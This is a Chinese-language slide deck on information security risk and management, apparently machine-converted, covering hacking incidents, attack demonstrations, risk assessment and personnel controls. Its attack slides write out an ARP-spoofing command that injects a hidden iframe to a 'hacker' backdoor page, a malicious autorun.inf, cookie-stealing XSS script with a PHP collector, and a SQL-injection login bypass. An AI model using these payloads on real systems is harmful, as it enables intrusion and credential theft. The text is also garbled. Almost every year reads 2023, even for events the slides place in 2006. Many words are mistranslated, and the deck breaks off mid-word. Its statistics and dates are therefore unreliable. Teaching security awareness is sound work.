信息安全風(fēng)險及分析

個人介紹

高顯嵩工作經(jīng)受：中國“互聯(lián)網(wǎng)信息安全與政府監(jiān)管”專家組成員中國法證技術(shù)爭論組成員北京司法局電子數(shù)據(jù)鑒定協(xié)會理事北京播送電視大學(xué)特聘專家原微軟公司的技術(shù)支持工程師工程背景勞動部全國民辦中介機構(gòu)信用等級評定系統(tǒng)勞動部全國學(xué)問競賽評分系統(tǒng)勞動部七個功能平臺合并方案北京統(tǒng)計局的報表打印系統(tǒng)北京電大一站式平臺合并的規(guī)劃及實施為考研在線供給整體安全解決方安及實施為國家電力部內(nèi)部網(wǎng)絡(luò)設(shè)計安全解決方安及實施鞍山移動公司網(wǎng)絡(luò)規(guī)劃長期負責(zé)北京市安全局國家安全部內(nèi)部技術(shù)培訓(xùn)負責(zé)華彬大廈的整個網(wǎng)絡(luò)規(guī)劃及實施美國百麥公司北京分公司的整個網(wǎng)絡(luò)規(guī)劃及實施主要內(nèi)容信息安全的重要性信息安全問題分析信息安全治理概述信息安全風(fēng)險治理信息安全人員治理信息安全重要性當(dāng)前我國網(wǎng)絡(luò)信息安全的狀況網(wǎng)絡(luò)及計算機病毒傳播泛濫垃圾郵件和病毒郵件泛濫黑客攻擊大事頻繁用戶的個人隱私及計算機的使用權(quán)受到侵害網(wǎng)絡(luò)犯罪大事頻繁監(jiān)管力度不夠涉及版權(quán)問題的大事增多沒有統(tǒng)一完善的適合國情的安全標準及法規(guī)沒有職責(zé)清楚的治理部門或治理小組制約與網(wǎng)絡(luò)根底設(shè)施和技術(shù)環(huán)境安全體系不健全全民安全意識及計算機網(wǎng)絡(luò)學(xué)問薄弱CERT有關(guān)信息安全的統(tǒng)計

CERT有關(guān)信息安全的統(tǒng)計CERT有關(guān)信息安全的統(tǒng)計

網(wǎng)絡(luò)病毒傳播泛濫據(jù)2023年調(diào)查，我國約73%的計算機用戶曾感染病毒，2023年上半年升至83%。其中，感染3次以上的用戶高達59%，而且病毒的破壞性較大，被病毒破壞全部數(shù)據(jù)的占14%，破壞局部數(shù)據(jù)的占57%。對病毒的預(yù)防和覺察速度相對緩慢垃圾郵件及病毒郵件泛濫黑客離我們很近1996年信息安全數(shù)據(jù)顯示，世界上平均每２０秒就有一起黑客大事發(fā)生，無論是政府機構(gòu)、軍事部門，還是各大銀行、大公司，只要與互聯(lián)網(wǎng)接軌，就難逃黑客的“黑手”。據(jù)美國網(wǎng)絡(luò)安全公司Sophos公布的報告顯示，在2023年第一季度，平均每5秒鐘就會有一個網(wǎng)頁成為黑客們的“盤中餐”。中國網(wǎng)民每年被網(wǎng)絡(luò)黑客“黑”掉76億元。FBI計算機犯罪調(diào)查報告2023年503家機構(gòu)中，有60%受到了攻擊2023年其中223家〔占503家的44%〕損失的總和到達$4.55848億2023年530家機構(gòu)中有75%〔398家〕在年內(nèi)受到了攻擊2023年251家〔占530家的47%〕的經(jīng)濟損失總和為$2.01799734億全球信息安全損失數(shù)額：

中國已成為全球黑客的第三大來源地

有關(guān)統(tǒng)計數(shù)據(jù)顯示，目前我國95%的與因特網(wǎng)相聯(lián)的網(wǎng)絡(luò)治理中心都遭到過國境內(nèi)外黑客的攻擊或侵入，受害涉及的掩蓋面越來越大、程度越來越深。據(jù)國際互聯(lián)網(wǎng)保安公司Symantec年的報告指出，中國甚至已經(jīng)成為全球黑客的第三大來源地，竟然有6.9%的攻擊國際互聯(lián)網(wǎng)活動都是由中國發(fā)出的。然而面對這種局面，我國卻缺乏像西方興旺國家那樣健全的防范措施。2023年黑客大事中韓新人王網(wǎng)上對抗遭黑客入侵推遲10多分鐘中韓圍棋新人王對抗賽在中國的新浪網(wǎng)和韓國ｃｙｂｅｒ網(wǎng)站落子，孔杰七段執(zhí)白中盤戰(zhàn)勝韓國的宋泰坤四段。賽前，由于有人以孔杰的名字入侵競賽的效勞器，導(dǎo)致競賽推遲了１０多分鐘才正常進展。2023年黑客大事百度連續(xù)患病嚴峻黑客攻擊5月15日至5月18日，中文搜尋網(wǎng)站百度遭到中國互聯(lián)網(wǎng)有史以來罕見黑客攻擊。據(jù)百度負責(zé)技術(shù)的副總裁劉建國介紹，自5月15日22:00起，百度的檢索量突然大增，此番增長并未引起工程師留意。5月16日，攻擊更加猛烈，每秒鐘攻擊次數(shù)搞到達1000次，同一個詞被查詢次數(shù)最多達38863次。據(jù)互聯(lián)網(wǎng)技術(shù)專家介紹，每秒鐘攻擊100次就已經(jīng)屬于特別嚴峻的攻擊，而每秒鐘1000次的攻擊就實屬罕見2023年黑客大事263玩耍論壇遭黑客攻擊關(guān)閉2023年黑客大事騰訊效勞器被攻擊10月17日早上10時許，國內(nèi)各地網(wǎng)民間續(xù)騰訊QQ無法登陸。據(jù)騰訊QQ內(nèi)部技術(shù)人員透露，一國內(nèi)團體，利用騰訊QQ效勞器漏洞挾制騰訊支付100萬美金作為“修復(fù)”費用，騰訊QQ不予理睬后，該組織于17日正式發(fā)動攻擊，騰訊QQ效勞器在1個小時內(nèi)大面積消失故障,不得不全面終止進展搶修.本次行動組織嚴謹、操作快速，業(yè)內(nèi)有局部安全治理人士稱網(wǎng)絡(luò)進入軟件綁架訛詐時代。2023年黑客大事江民網(wǎng)站被攻擊2023年10月17日國內(nèi)著名的殺毒軟件廠商江民公司的網(wǎng)站被一名為河馬史詩的黑客攻破，頁面內(nèi)容被篡改。攻擊緣由：江民公司的最新殺毒軟件產(chǎn)品KV2023的升級導(dǎo)致用戶在上網(wǎng)時無法翻開“郵件監(jiān)控和網(wǎng)頁監(jiān)控”，用戶在江民公司的官方論壇發(fā)反映后，江民沒有做出準時的回復(fù)，也沒能在短時間內(nèi)解決用戶的問題。2023年黑客大事頻繁或許你的計算機正在被當(dāng)作從事違法犯罪活動的工具，而當(dāng)這些靜靜發(fā)生的時候，你卻一無所知，由于你的電腦已經(jīng)成為被別人掌握的“僵尸電腦”。2023年黑客大事國內(nèi)首起僵尸網(wǎng)絡(luò)大事今年27歲的徐立系唐山市某企業(yè)工人，其利用某些手段在互聯(lián)網(wǎng)上傳播其編寫的特定程序，先后植入4萬余臺計算機，形成了中國首例BOTNET“僵尸網(wǎng)絡(luò)。

2023年10月至2023年1月，徐立操縱“僵尸網(wǎng)絡(luò)”對北京大呂黃鐘電子商務(wù)所屬音樂網(wǎng)站北京飛行網(wǎng)〔簡稱酷樂〕，發(fā)動屢次攻擊，致使該公司蒙受重大經(jīng)濟損失，并導(dǎo)致北京電信數(shù)據(jù)中心某機房網(wǎng)絡(luò)設(shè)備大面積癱瘓。2023年黑客大事2023年12月31日中國工商銀行被黑06年的最終一天，很多網(wǎng)友都收到一些號稱“工行要倒閉，全部存款均沒收”之類的新聞鏈接，地址都是正牌的，而不是盜版的。原來工商被黑客入侵，截止當(dāng)天晚上11點，覺察此漏洞已經(jīng)修改好。07年第一黑客大事深圳律師網(wǎng)被黑當(dāng)進入該網(wǎng)站之后，就發(fā)生事故了，覺察，已經(jīng)被黑.主要有以下字樣：天空未留痕跡,鳥兒卻已飛過.網(wǎng)絡(luò)亦是虛擬,瘋狂亦是叛逆.

.......~~~敬重的網(wǎng)站治理員您好~~~.....................臺灣是中國的，日本是吃S的...........................假設(shè)你是中國人......................請保存此頁幾天感謝!.........

少年★浪子所向披靡OICQ11888956例子：得到本地登錄密碼Pulist.exe+findpass.exePasswordReminder.exe例子：記錄本地登錄密碼GINAPassWordSniffer例子得到遠程計算機的密碼IpcScan2.0例子：更改本地治理員密碼WindowsNT/2023/XP/2023/Linux/Unix系統(tǒng)，本地接觸可以更改任意用戶的密碼。一張軟盤更改本地治理員密碼Ntpassword一張光盤更改本地治理員密碼ERDCommander2023例子：ERDCOMMANDER例子：ERDCOMMANDER例子：得到他人的郵件密碼密碼監(jiān)聽器2.8例子：內(nèi)網(wǎng)滲透ZXARPS.EXE內(nèi)網(wǎng)主機訪問任意站點被入侵指定的IP段中的用戶訪問的全部網(wǎng)站都插入一個框架代碼zxarps.exe-idx0-ip-9-port80-insert“<iframesrc=‘://hacker/backdoor.htm”width=0height=0>“ARP協(xié)議工作原理ARP哄騙交換機ARP哄騙計算機例子：內(nèi)網(wǎng)U盤感染U盤在互聯(lián)網(wǎng)和局域網(wǎng)內(nèi)穿插使用文件被盜取Autorun.infautorun風(fēng)暴[autorun]open=shell\open=翻開(&O)shell\open\Command=WScript.exe.\autorun.vbsshell\open\Default=1shell\explore=資源治理器(&X)shell\explore\Command=WScript.exe.\autorun.vbs例子：查看網(wǎng)絡(luò)內(nèi)任何人的上網(wǎng)記錄可以記錄同一局域網(wǎng)內(nèi)任何計算機上掃瞄的網(wǎng)頁內(nèi)容，觀察的郵箱內(nèi)容，登陸的ftp的內(nèi)容。用Outlook或者OutlookExpress承受的全部郵件都回同時被該軟件接收。例子：查看MSN密碼例子：觀察星號密碼例子：讀取緩存密碼例子：掌握他人計算機Dameware4.5RemoteAdministrator2.1是一種網(wǎng)絡(luò)治理軟件，但是常常被黑客利用來遠程掌握和治理，被入侵者的計算機。例子：翻開對方攝像頭和語音SQLINJECTION針對網(wǎng)站的攻擊SQLINJECTION針對網(wǎng)站的攻擊SQLINJECTION針對網(wǎng)站的攻擊SQLINJECTION針對網(wǎng)站的攻擊SQLINJECTION針對網(wǎng)站的攻擊SQLINJECTION針對網(wǎng)站的攻擊SQLINJECTION針對網(wǎng)站的攻擊SQLINJECTION針對網(wǎng)站的攻擊SQLINJECTION針對網(wǎng)站的攻擊XSS跨站腳本構(gòu)建了個Javascript腳本傳遞客戶端的cookie到黑客的效勞器Javascript腳本可以簡潔的這樣寫

varimg=newImage;

img.src=‘get_cookie.php?var=’+encodeURI(document.cookie);

然后效勞器端使用PHP簡潔寫了個腳本保存Cookie數(shù)據(jù)

<?php

if(isset($_GET[‘var’])){

file_put_contents(‘./cookie/’.time.‘.txt’,urldecode($_GET[‘var’]));

}?>

構(gòu)造SQL登陸語句用戶名:admin密碼:1’or‘1’=‘1其他例子擊鍵記錄Office文檔掛栽木馬網(wǎng)頁木馬木馬捆綁信息安全治理概述例一：局域網(wǎng)內(nèi)病毒泛濫成災(zāi)。例二：網(wǎng)絡(luò)中為什么會有ARP哄騙的問題發(fā)生例三：局域網(wǎng)內(nèi)計算機故障頻繁發(fā)生例四：為什么要給每個用戶治理員權(quán)限先來分析兩個例子信息安全的成敗取決于兩個因素：技術(shù)和治理。技術(shù)是信息安全的構(gòu)筑材料，治理是真正的粘合劑和催化劑。人們常說，三分技術(shù)，七分治理，可見治理對信息安全的重要性。信息安全治理〔InformationSecurityManagement〕作為組織完整的治理體系中一個重要的環(huán)節(jié)，它構(gòu)成了信息安全具有能動性的局部，是指導(dǎo)和掌握組織的關(guān)于信息安全風(fēng)險的相互協(xié)調(diào)的活動，其針對對象就是組織的信息資產(chǎn)?，F(xiàn)實世界里大多數(shù)安全大事的發(fā)生和安全隱患的存在，與其說是技術(shù)上的緣由，不如說是治理不善造成的，理解并重視治理對于信息安全的關(guān)鍵作用，對于真正實現(xiàn)信息安全目標來說尤其重要。什么是信息安全治理？

根據(jù)風(fēng)險評估結(jié)果、法律法規(guī)要求、組織業(yè)務(wù)運作自身需要來確定控制目標與控制措施。

實施所選的安全控制措施。

針對檢查結(jié)果采取應(yīng)對措施，改進安全狀況。

依據(jù)策略、程序、標準和法律法規(guī)，對安全措施的實施情況進行符合性檢查。信息安全治理模型信息安全必需從整體考慮，必需做到“有打算有目標、覺察問題、分析問題、實行措施解決問題、后續(xù)監(jiān)視避開再現(xiàn)”這樣全程治理的思路，這就要求建立的是一套完整的信息安全治理體系，這樣的系統(tǒng)工程，只有處于組織最高治理者領(lǐng)導(dǎo)和支持之下，才可能成功最高治理層通過明確信息安全目標和方針為信息安全活動指引方向最高治理層能夠為信息安全活動供給必要的資源支持最高治理層能夠在重大問題上做出決策最高治理層可以協(xié)調(diào)組織不同單位不同環(huán)節(jié)的關(guān)系，提升促動力說究竟，最高治理者是組織信息安全的最終責(zé)任人組織高管全面負責(zé)信息安全治理制定有效的安全治理打算，可以確保信息安全策略得到恰當(dāng)執(zhí)行進展有效安全治理的途徑，應(yīng)當(dāng)是自上而下的〔Top-Down〕：最高治理層負責(zé)啟動并定義組織的安全方針治理中層負責(zé)將安全策略充實成標準、基線、指南和程序，并監(jiān)視執(zhí)行業(yè)務(wù)經(jīng)理或安全專家負責(zé)實施安全治理文件中的指定配置最終用戶負責(zé)遵守組織全部的安全策略安全治理打算小組應(yīng)當(dāng)開發(fā)三類打算：戰(zhàn)略打算〔strategicplan〕是長期打算〔例如5年〕，相對穩(wěn)定，定義了組織的目標和使命戰(zhàn)術(shù)打算〔tacticalplan〕是中期打算〔例如1年〕，是對實現(xiàn)戰(zhàn)略打算中既定目標的任務(wù)和進度的細節(jié)描述，例如雇用打算、預(yù)算打算、維護打算、系統(tǒng)開發(fā)打算等操作打算〔operationalplan〕是短期的高度細化的打算，須常常更新〔每月或每季度〕，例如培訓(xùn)打算、系統(tǒng)部署打算、產(chǎn)品設(shè)計打算等按打算行事數(shù)據(jù)收集者〔DataCollector〕對數(shù)據(jù)主體〔DataSubject〕：準確〔Accuracy〕、隱私〔Privacy〕；數(shù)據(jù)保管者〔DataCustodian〕對數(shù)據(jù)擁有者〔DataOwner〕：可用性〔Availability〕、完整性〔Integrity〕、保密性〔Confidentiality〕；數(shù)據(jù)用戶〔DataUsers〕對擁有者/主體〔Owner/Subject〕：保密性〔Confidentiality〕和完整性；系統(tǒng)用戶〔SystemUsers〕對系統(tǒng)擁有者〔SystemOwner〕：可用性〔Availability〕和軟件完整性〔SoftwareIntegrity〕；系統(tǒng)治理者〔SystemManager〕對用戶〔Users〕，可用性〔Integrity〕、完整性〔Integrity〕；用戶〔Users〕對其它用戶〔OtherUsers〕：可用性〔Availability〕。重要角色和職責(zé)信息安全管風(fēng)險治理風(fēng)險風(fēng)險治理〔RiskManagement〕就是識別風(fēng)險、評估風(fēng)險、實行措施將風(fēng)險削減到可承受水平，并維持這個風(fēng)險水平的過程。風(fēng)險治理是信息安全治理的核心內(nèi)容。在信息安全領(lǐng)域，風(fēng)險〔Risk〕就是指信息資產(chǎn)患病損壞并給企業(yè)帶來負面影響的潛在可能性。風(fēng)險治理風(fēng)險治理概述資產(chǎn)〔Asset〕——對組織具有價值的信息資產(chǎn)，包括計算機硬件、通信設(shè)施、數(shù)據(jù)庫、文檔信息、軟件、信息效勞和人員等，全部這些資產(chǎn)都需要妥當(dāng)愛護。威逼〔Threat〕——可能對資產(chǎn)或組織造成損害的某種安全大事發(fā)生的潛在緣由，需要識別出威逼源〔Threatsource〕或威逼代理〔Threatagent〕。弱點〔Vulnerability〕——也被稱作漏洞或脆弱性，即資產(chǎn)或資產(chǎn)組中存在的可被威逼利用的缺點，弱點一旦被利用，就可能對資產(chǎn)造成損害。風(fēng)險〔Risk〕——特定威逼利用資產(chǎn)弱點給資產(chǎn)或資產(chǎn)組帶來損害的潛在可能性?？赡苄浴睱ikelihood〕——對威逼發(fā)生幾率〔Probability〕或頻率〔Frequency〕的定性描述。影響〔Impact〕——后果〔Consequence〕，意外大事發(fā)生給組織帶來的直接或間接的損失或損害。安全措施〔Safeguard〕——掌握〔control〕或?qū)Σ摺瞔ountermeasure〕，即通過防范威逼、削減弱點、限制意外大事帶來影響等途徑來消減風(fēng)險的機制、方法和措施。殘留風(fēng)險〔ResidualRisk〕——在實施安全措施之后仍舊存在的風(fēng)險。風(fēng)險治理相關(guān)要素風(fēng)險RISKRISKRISKRISK風(fēng)險基本的風(fēng)險采取措施后剩余的風(fēng)險資產(chǎn)威脅弱點資產(chǎn)威脅弱點風(fēng)險治理的目標安全控制的成本安全事件造成的損失最小化的總成本低高高安全成本/損失所提供的安全水平關(guān)鍵是達成本錢利益的平衡識別并評價資產(chǎn)識別并評估威脅識別并評估弱點現(xiàn)有控制確認風(fēng)險評價接受保持現(xiàn)有控制確定風(fēng)險消減策略選擇控制目標和控制方式實施選定的控制YesNo確認并評估殘留風(fēng)險定期評估風(fēng)險評估風(fēng)險消減風(fēng)險接受及控制風(fēng)險管理風(fēng)險治理的一般過程風(fēng)險評估〔RiskAssessment〕是對信息資產(chǎn)及其價值、面臨的威逼、存在的弱點，以及三者綜合作用而帶來風(fēng)險的大小或水平的評估。作為風(fēng)險治理的根底，風(fēng)險評估是組織確定信息安全需求的一個重要途徑，屬于組織信息安全治理體系籌劃的過程。主要任務(wù)包括：識別構(gòu)成風(fēng)險的各種因素評估風(fēng)險發(fā)生的可能性和造成的影響，并最終評價風(fēng)險水平或大小確定組織承受風(fēng)險的力量確定風(fēng)險消減和掌握的策略、目標和優(yōu)先挨次推舉風(fēng)險消減對策以供實施包括風(fēng)險分析〔RiskAnalysis〕和風(fēng)險評價〔RiskEvaluation〕兩局部，但一般來說，風(fēng)險評估和風(fēng)險分析同義。什么是風(fēng)險評估？降低風(fēng)險〔ReduceRisk〕——實施有效掌握，將風(fēng)險降低到可承受的程度，實際上就是力圖減小威逼發(fā)生的可能性和帶來的影響，包括：削減威逼：例如，實施惡意軟件掌握程序，削減信息系統(tǒng)受惡意軟件攻擊的時機削減弱點：例如，通過安全意識培訓(xùn)，強化職員的安全意識與安全操作力量降低影響：例如，制定災(zāi)難恢復(fù)打算和業(yè)務(wù)連續(xù)性打算，做好備份躲避風(fēng)險〔AvoidRisk〕——或者RejectingRisk。有時候，組織可以選擇放棄某些可能引來風(fēng)險的業(yè)務(wù)或資產(chǎn)，以此躲避風(fēng)險。例如，將重要的計算機系統(tǒng)與互聯(lián)網(wǎng)隔離，使其免遭來自外部網(wǎng)絡(luò)的攻擊。轉(zhuǎn)嫁風(fēng)險〔TransferRisk〕——也稱作RiskAssignment。將風(fēng)險全部或者局部地轉(zhuǎn)移到其他責(zé)任方，例如購置商業(yè)保險。承受風(fēng)險〔AcceptRisk〕——在實施了其他風(fēng)險應(yīng)對措施之后，對于殘留的風(fēng)險，組織可以選擇承受。確定風(fēng)險消減策略確定安全〔即零風(fēng)險〕是不行能的。實施安全掌握后會有殘留風(fēng)險或殘存風(fēng)險〔ResidualRisk〕。為了實現(xiàn)信息安全，應(yīng)當(dāng)確保殘留風(fēng)險在可承受的范圍內(nèi)：殘留風(fēng)險Rr＝原有風(fēng)險R0－掌握效力ΔR殘留風(fēng)險Rr≤可承受的風(fēng)險Rt對殘留風(fēng)險進展確認和評價的過程其實就是風(fēng)險承受的過程。決策者可以依據(jù)風(fēng)險評估的結(jié)果來確定一個閥值，以該閥值作為是否承受殘留風(fēng)險的標準。評價殘留風(fēng)險信息安全人員治理人是信息安全的關(guān)鍵因素，人員治理不善會給組織帶來特別大的安全威逼和風(fēng)險。有調(diào)查顯示，大多數(shù)重大信息安全大事通常都來自組織內(nèi)部，例如，員工受利益驅(qū)使將公司技術(shù)圖紙出賣給競爭對手，利用內(nèi)部系統(tǒng)從事經(jīng)濟犯罪活動，或者由于缺乏安全意識或操作技能而導(dǎo)致誤操作，引起信息系統(tǒng)故障等。為降低內(nèi)部員工所帶來的人為過失、盜竊、欺詐及濫用設(shè)施的風(fēng)險，并且避開引發(fā)法律風(fēng)險，組織應(yīng)當(dāng)實行措施，加強內(nèi)部人員的安全治理：對工作申請者實施背景檢查簽署雇用合同和保密協(xié)議加強在職人員的安全治理嚴格掌握人員離職程序必需高度重視人員安全問題背景檢查是工作申請過程的一個局部，組織至少會審查申請人簡歷中的根本信息。對于敏感職位，可能還會考慮進一步的調(diào)查。調(diào)查過程中，組織可以懇求訪問申請人的信用和犯罪記錄，甚至可以聘請外部公司對申請人進展調(diào)查，以確定是否存在潛在問題或利益沖突。通過背景檢查，可以防止：由于人員辭退而導(dǎo)致法律訴訟由于雇用疏忽而導(dǎo)致第三方的法律訴訟雇用不合格的人員喪失商業(yè)隱秘員工從一般崗位轉(zhuǎn)入信息安全重要崗位，組織也應(yīng)當(dāng)對其進展檢查，對于處在有相當(dāng)權(quán)力位置的人員，這種檢查應(yīng)定期進展。背景檢查〔BACKGROUNDCHECK〕組織應(yīng)與全部員工簽訂保密協(xié)議，作為雇用合同根本條款的一局部保密協(xié)議應(yīng)明確規(guī)定雇員對組織信息安全的責(zé)任、保密要求及違約的法律責(zé)任簽訂保密承諾旨在加強員工對組織信息安全應(yīng)擔(dān)當(dāng)?shù)呢?zé)任，協(xié)議上應(yīng)有員工的簽名并由其保存一份協(xié)議副本對于處于試用期的新員工，要求其簽訂一份保密承諾在允許第三方用戶使用信息處理設(shè)施之前，要求其簽訂保密協(xié)議當(dāng)雇用期或合同期有更改，特殊是雇員到期離職或合同終止時，應(yīng)重申保密協(xié)議保密協(xié)議〔CONFIDENTIALITYAGREEMENT〕職務(wù)分別〔SeparationofDuties〕，將一個關(guān)鍵任務(wù)分成多個不同的局部，每個局部由不同的人執(zhí)行。共謀〔Coll